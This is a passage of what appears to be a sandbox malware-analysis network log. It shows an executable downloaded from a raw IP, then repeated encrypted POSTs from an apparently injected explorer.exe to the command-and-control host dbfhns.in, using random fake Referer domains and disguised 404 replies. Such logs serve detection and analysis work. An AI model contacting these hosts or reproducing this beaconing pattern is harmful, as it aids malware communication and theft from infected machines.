                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: 91.202.233.231
                                                          May 27, 2024 00:27:52.326961040 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:52 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Last-Modified: Sun, 26 May 2024 22:23:46 GMT
                                                          ETag: "20ba00-61962daa50080"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 2144768
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-msdos-program


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.5 | 49744 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:54.236884117 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ipxqunnvdoai.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 332
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:54.236920118 CEST332OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 34 22 df e7
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA ,[k,vu4"Q?RRErVTX%/bEJ,+$V\5a37)&}>F$2J^'CffhA*O"$^M
                                                          May 27, 2024 00:27:55.208365917 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:55 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.5 | 49773 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:29:06.967757940 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://xrjlnlbrgajqsny.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:06.967777967 CEST220OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 61 0a b7 ba
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuaV\jzfYx!hRDMQP|(",rhF']uJ#C(>Q?4@YW/g
                                                          May 27, 2024 00:29:08.052684069 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:07 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.5 | 49774 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:29:14.086644888 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://uopupolbajboxnf.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 340
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:14.086675882 CEST340OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 57 c6 a6
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuQWJZsI<n>)O8s@tB)<MF|=US3W]h\L{/5{rx(Iv2PDzD\no\Yg\
                                                          May 27, 2024 00:29:15.142350912 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:14 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.5 | 49775 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:29:19.604016066 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://imsuruvsrfypw.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 276
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:19.604016066 CEST276OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2e 07 a0 ed
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu.k1nmg48-`5;4l,oK(W@'tFJSR!R^*ifEhN{grC4E>}m}Li^Dz]oqh=8m
                                                          May 27, 2024 00:29:20.635092974 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:20 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.5 | 49776 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:29:27.743669987 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://uvpyitsqtsmmqygu.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 248
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:27.743717909 CEST248OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 32 ee e4
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuV2am$d^4{=+n\uPk0Z@]M"KFL{5Gzi*(!@nVd` Dv~h1z#^c(Q5
                                                          May 27, 2024 00:29:28.763854980 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:28 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          21 | 192.168.2.5 | 49777 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:29:33.855725050 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://yowyackmlvbjrxy.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 162
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:33.856026888 CEST162OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 1b bc b6
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu)J=nuAa;B]$/QNCTWZNn/\<{_
                                                          May 27, 2024 00:29:34.922079086 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:34 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.5 | 49778 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:29:39.895797014 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://jkbknieekjatcp.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 187
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:39.895843029 CEST187OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 37 c8 bf
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu77IG[u6OI6rkGT#bNb.*S}X0#bWP2dQ%3
                                                          May 27, 2024 00:29:40.945394993 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:40 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.5 | 49779 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:29:47.866786957 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://txclniyqjcys.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 128
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:47.866815090 CEST128OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 3c e1 8a
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuC<\Vw`L1mSDhz(}~!
                                                          May 27, 2024 00:29:48.894093037 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:48 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.5 | 49780 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:29:52.939237118 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://kmtbjhmhexqkn.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 279
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:52.939274073 CEST279OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 02 ef 89
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuzS@]AtwOn[ss(A;K>TU_Z#BZFV^'ZX~+DZ&xHK]|<qzMC&X|gZ#h9Nu
                                                          May 27, 2024 00:29:53.945550919 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:53 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.5 | 49781 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:29:58.334388971 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://jsnmddlhyunj.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 142
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:58.334429026 CEST142OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 52 d9 ae
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu:RSNNoSUCjF"XPL7$Gn8
                                                          May 27, 2024 00:29:59.526978970 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:59 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.5 | 49782 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:30:05.849412918 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://eamimphmsadwkq.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 246
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:05.849412918 CEST | 246 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 56 ac e6
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuxVkdklF^&Ta:?y:uDz#]^r4]2Y|*QZ7M&s!Z)5RH%7zfv/EPk`vFK#"
                                                          May 27, 2024 00:30:06.899574041 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:06 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.5 | 49783 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:30:11.305895090 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://anyyjopgfajdv.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 173
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:11.305944920 CEST | 173 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 33 a7 fc
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu43\Zk_}4c?r;Zv|g&J~-SU1ORI=1tIO;/
                                                          May 27, 2024 00:30:12.513031006 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:12 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.5 | 49784 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:30:16.965106964 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://tlfkitushftrjirb.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 211
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:16.965137005 CEST | 211 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 45 c7 fb
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu|E\~rZ}T8v5uw,0`Gz"%ZJYT>-={^HLG!|mqo%-Br
                                                          May 27, 2024 00:30:17.984780073 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:17 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.5 | 49785 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:30:23.451714039 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://plbuqwbmoldqvnm.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 185
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:23.451714993 CEST | 185 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 30 c1 ae
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu,0W,Y`ecgZSbkrh\PSo&)XAb+U^=<fXOwN*
                                                          May 27, 2024 00:30:24.474302053 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:24 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.5 | 49786 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:30:28.702004910 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://tjxcjquxocrwkw.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 205
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:28.702028036 CEST | 205 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 56 fe e6
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu~Vw7wfWU#>3SB_fs{x8Kdg!\U>?Aj[Q@[=7&x1
                                                          May 27, 2024 00:30:29.990979910 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:29 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.5 | 49787 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:30:34.843314886 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://wmlhlokjcexweyx.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 248
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:34.843359947 CEST | 248 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 5a b2 83
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuCZ1Bw:v"a8ZT2{@B&I]h\8tW.Q%gpjP}%K"wqYT29:jIPS3p6{i`[1)-
                                                          May 27, 2024 00:30:35.907485008 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:35 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          32 | 192.168.2.5 | 49788 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:30:42.022425890 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://vjusdpgryce.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 196
                                                          Host: dbfhns.in
